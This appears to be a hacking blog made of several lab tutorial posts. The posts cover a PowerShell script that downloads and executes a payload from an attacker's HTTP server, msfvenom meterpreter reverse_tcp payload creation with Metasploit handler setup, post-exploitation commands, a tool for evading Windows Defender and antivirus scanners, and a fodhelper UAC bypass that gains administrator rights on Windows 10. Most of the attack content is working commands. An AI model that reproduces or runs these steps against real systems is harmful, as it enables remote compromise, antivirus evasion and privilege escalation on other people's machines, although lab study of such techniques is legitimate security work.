Powershell – Download and execute .exe

Here’s a simple script that will download and run an executable file from within Powershell.

First let’s serve up the file from our host machine. We can do this very quickly with python. Go to the directory where the file is stored, right click and start terminal from here. This will put you in a terminal window that is already in the directory of the file we want to serve up.

python3 -m http:server 8000

We now have a simple http server running and it is ready to serve up our malicious file.

Next create a Powershell script that will connect to this server and download the payload, then execute it.

$down = New-Object System.Net.WebClient
$url  = 'http://10.0.2.15:8080/MrBazza.exe';
$file = 'MrBazza.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);

In the above code we are connecting to our server and downloading the executable file. It is then saved under a designated filename, and we then execute the file. This is saved as .ps1 file.

Finally, let’s setup a meterpreter session on our host machine ready to listen out for when the program is executed.

$ msfconsole 

once the metasploit console is open, we will start out session.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

This will start metasploit listening for our incoming connection.

The below screen shot shows both our open terminals, metasploit and the python server

Now, we go over to our windows machine, and we run our Powershell script. It will connect to our host web server, download and execute the file.

If we go back to our linux machine, we can see the logs of the python web server indicate the connection and downloading of the file, and we have our meterpreter session started. We can get details on the machine by using

meterpreter > sysinfo 

So there is a quick and easy way to setup a web server with python, and serve up files that are automatically downloaded and executed using a Powershell script.

Advertisement

Evade Virus Scanners MSFVenom Payload Generator – CatchYou2

So in my efforts to find various ways of encoding MSFVenom payloads to evade virus detection and Windows Defender, I came across CatchYou-2, an updated version of CatchYou. Available on GitHub

https://github.com/SrMilton/CatchYou-2

I have been able to generate payloads that when uploaded to https://antiscan.me were detected by only 1 out of 26 virus scanners. (https://antiscan.me/scan/new/result?id=LvjTqXSJNb9C) and it cleared Windows 10 Defender.

I was able to successfully upload it to my Windows 10 fully patched machine running Defender and was not picked up as a virus at all.

However, once I attempt to run the payload, it is going blocked and session is not able to start. We have successfully hidden the file from Virus Scanning but its execution is causing Defender to block it. It is becoming harder to use off the shelf MSFVenom exploits these days and some creativity is needed to get around it.

The payload worked perfectly on Windows 7.

Editing a file in VIM editor

In a previous article we connected with a target machine using metasploit and a payload created using msfvenom. Then uploaded a text file to that machine.

In this article we will look at the edit command in metasploit, and how to use it.

So let’s imagine we are already connected and in the directory that contains the text file we wish to edit. We will run the command

meterpreter > edit you_have_been_hacked.txt

this will open the text file using the VIM editor. This can be a little tricky to use. So here’s some basics. Below shows our text file opened in the VIM editor.

First we will go into edit mode by pressing “i” which is insert mode. Afer this you will be able to edit the text as you wish. Below you can see we added a new line of text.

Now to save and quit, press esc and :w followed by enter to save. esc and :q followed by enter will quit back to the metasploit console.

So that’s all there is to it. Of course you also have the option of downloading the file, editing it locally, and then uploading again.

Creating a simple payload with msfvenom

In order to establish a connection between metasploit and your target machine, it is necessary to create a payload. The payload is a program that contains malicious code to allow a backdoor between you and the target machine. Creating the payload is relatively easy using msfvenom. What is difficult is getting the payload onto the target machine through social engineering, and getting it past the various virus scanners that are commonly used.

In this exercise, we will be turning off the windows defender virus tools on windows 10 in order to create a simple payload and connection between us and the target machine in our virtual lab.

we will create a payload with the reverse_tcp function. So open up your terminal and execute the following command

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.2.4 lport=1234 -f exe >win10.exe

Now you will find the created .exe file in your linux directory

You would now need to find a way to get this file onto the target system and executed. There are various ways this can be done, and more advanced methods of disguising the file. These are outside the scope of this tutorial. Let us just assume that the file is now on the target windows machine and ready to be executed.

So in preparation we need to setup our machine to listen for the connection when the payload is run.

Open up your terminal and start metasploit by running msfconsole

$ msfconsole  

Now we will setup metasploit to listen for the incoming connection as follows

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.2.4
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > exploit

now once the .exe file is run on our target machine a connection will be established

We are now connected to the target machine and can start to do some interesting things. First however, let’s find out about the machine we are connected to by using the sys info command

meterpreter > sysinfo

we can also find out the user ID of the person currently logged into the system with getuid command

meterpreter > getuid

we can see what processes are running using ps command

meterpreter > ps

we can execute a program, for example, we could remotely start the notepad application by the command

meterpreter > execute -f notepad.exe

you will see on your remote windows machine the notepad application open.

finally, we will upload a file to the target machine. On our machine we have a text file named “you_have_been_hacked.txt” in the directory home/kali. The file will upload the directory we are currently in on the target machine. By default when connecting you will be in the directory that the payload was stored. You can use cd /xxxxxx commands to change directory. In our case we have navigated to the desktop directory of the user on the target machine. You can check where you are by using the dir command.

meterpreter > dir

meterpreter > upload /home/kali/you_have_been_hacked.txt

This command will upload that file to the target machine

This of course could be something much more malicious than a simple text file. It could be a key logger that will run in the background, log data and next time you connect you could download the data for example. Although metasploit has a built in key logger, which we will explore in another article, it relies on the connection remaining open.

Bypassing UAC in Windows 10

Utilizing Meterpreter we have started a session with our target machine. The machine is running Windows 10, and we need to gain administrator privileges.

If you try using the usual getsystem command, it fails with an error. Usually you can utilize the bypassuac module, but I have experienced that this also fails with a message that this version of windows 10 is not vulnerable to this attack.

In this blog we will explore the way to solve the problem of the getsystem error and bypassuac failing in windows 10.

I will assume that you have already created your payload, and initiated the reverse_tcp connection wit the target machine. We are now connected and in the Meterpreter terminal.

If we run getuid you can see the username we are logged in with

getsystem attempts to gain us administrator privileges, but fails.

Usually at this point we could switch to using bypassuac to gain administrator privileges.

meterpreter > background
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

Above commands will background the open Meterpreter session, load the bypassuac module, set the payload and run the exploit. However on windows 10 it will fail with the message :-

[-] Exploit aborted due to failure: not-vulnerable: Windows 10 (10.0 Build 17763). is not vulnerable.

Another method would be the bypassuac_injection method.

msf6 > use exploit/windows/local/bypassuac_injection
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

When we run this we get a failure with error message

[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System

If we switch back to our active session with sessions –i 1 and run getsystem again, we still get same failure

So what can we do on windows 10 to get around this problem?

We can use the bypassuac with the addition of fodhelper. Let’s take a look at how this works out

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

The result of this is that the windows fodhelper.exe is spawned under a new shell that has UAC switched off.

You will now be back inside your session, sysinfo and getuid will both give the same details as before.

Now when you run getsystem I will be succesful

meterpreter > getsystem
meterpreter > getuid

You now have full administrator access to the windows 10 machine. if you execute the shell command, it will give you a command prompt with full administrator privileges.